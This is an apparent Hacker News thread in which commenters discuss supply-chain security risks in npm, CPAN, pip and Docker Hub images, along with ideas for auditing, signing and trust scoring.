Hacker News new | past | comments | ask | show | jobs | submit login

I wonder how much malicious code like this is doing its work deep down in the endless pyramid of npm dependencies.

And how much as-of-now clean code will turn into malicious code when bad guys take over npm repos in the future.

It might be possible to tackle this issue by some intelligent trust algo that combines a trust rank similar to google-page-rank and signed messages.

Say somebody pushes an update to their repo. Now the first user of it might read it and sign it with 'Looks OK /Joe'. And the next user sees the signed message by Joe in some kind of package-review-message list. Based on all the reviews and the trust of the reviewers, they then can calculate a trust score for the update.




...or CPAN modules, composer libs, cocoa pods, etc. Anything you use to install unchecked external code is potentially dangerous.

At least npm has auditing now, so checking for problems is relatively trivial. GitHub even does it automatically.


Well, it's much, much easier for me to audit a CPAN module than a Docker image - the latter is practically impossible.


eh?

Assuming automated builds, you can just read the dockerfile (and it's hierarchy if necessary), it's less complex syntax than perl by a long way.

Even assuming no automated build, all the information is in the manifest, and using something like portainer it's pretty easy to read.


> you can just read the dockerfile

For many images, no Dockerfile is provided. And even if there is, it's not clear that it has been used to produce the software. I tried many times to reproduce images from Dockerfiles and failed: What `apt get update` does, depends on the current time and your network configuration. You can never be suer what you get from DockerHub.

My strategy has been to copy the Dockerfiles and run `docker build` myself, instead of using the image files. Alas it's does not work very well.


So it should generally be possible to go from image --> dockerfile as the information is included in the manifest. If you save an image as a .tar.gz you can extract the info from there or there are also tools to reverse engineer Dockerfiles from images

https://samaritan.ai/blog/reversing-docker-images-into-docke...

That is a good point about lack of reproducability though. I suppose an interesting attack would be to deliberately forge information in the manifest before pushing to Docker hub...

I also tend to use anything other than the official images as "inspiration" and re-implement myself.


> I suppose an interesting attack would be to deliberately forge information in the manifest before pushing to Docker hub...

"Forge" is a bit of a strong word. The main reason Docker included build information in the image history was so that build caching would work (from memory). It's not meant to be an authoritative source of information about how an image was built at all (not to mention that "RUN apt-get update" tells you almost nothing about what packages were installed, when they were updated, etc).

Personally I think that the current trend of using Dockerfiles is completely broken in terms of reproduciblity and introspectability (I'm working on a blog post to better explain the issue).


Don't a lot of OS images start by importing a non-transparent prebuilt tarball containing nontrivial binaries? I would hide the malware inside those.


Sure, but so could the OS or app distributors. You need to establish a baseline of trust somewhere, and this will likely be on the official (or your cherry picked official) images, and you build from there.


The official images are made by the OS project themselves, so if you can get malware in there, you can just get your malware into debian/CentOS/alpine and not even bother with Docker hub :)


They do, but you can easily see what's being used as a base image. If it's something odd then you should think twice about using it.


How? The Dockerfile downloads a bunch of files/programs that it is not clear what they are? How are you going to automatically catch these?


You can use the `docker trust` to verify which key (if any) was used to sign a given docker image. The `docker history` command will also give you a list of each of the layers as well as the command which was used to create the layer.


It's trivial to insert software into the build pipeline without being noticed.

Run your own devpi server, build a compromised version of any dependency you want, and you can install whatever you would like, with no sign of it in the Dockerfile.


Between pip, npm and DockerHub, we seem to be inviting all kinds of lurking security holes. What if the code was used in an embedded system - probably never to be updated again.



Seems like we need some kind of inter-repository git. Allowing for signed commits and version control between repositories.


You get this type of security inherently via most os-level packagers which check upstream tarballs especially the ports-like ones which are primarily designed for from-source usage.

Unfortunately there has been a trend to ignore these and install directly of late, especially for dynamic language modules.


Or in Windows, or in Linux, or in Android, or in IOS, or in OSX, ....

npm (and i think the other repos too) implement more and more security tools and procedures to reduce the risk. But 100% security is impossible.


    Or in Windows, or in Linux, or in Android,
    or in IOS, or in OSX
None of these let random users upload stuff to their repos.


But they have many developers. And one developer could insert code which works and passes tests, but in Background start someday a download and start monero mining.

The point is: you have to trust the developers at this companies, that they not do anything bad and that the companies check every code of every dev. Trust.


Tools like Snyk are doing good work to try and solve this problem.

https://snyk.io/


This looks promising but I hope that _Snyk_ itself is not compromised. And of course, http://wiki.c2.com/?TheKenThompsonHack


npm packages are interesting in that they run both in-browser and in-server -- it stands to reason that the in-browser attack surface is far larger and its impact would be rarely noticed by users (since they're already accustomed to websites taking up inordinate amount of resources.)




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: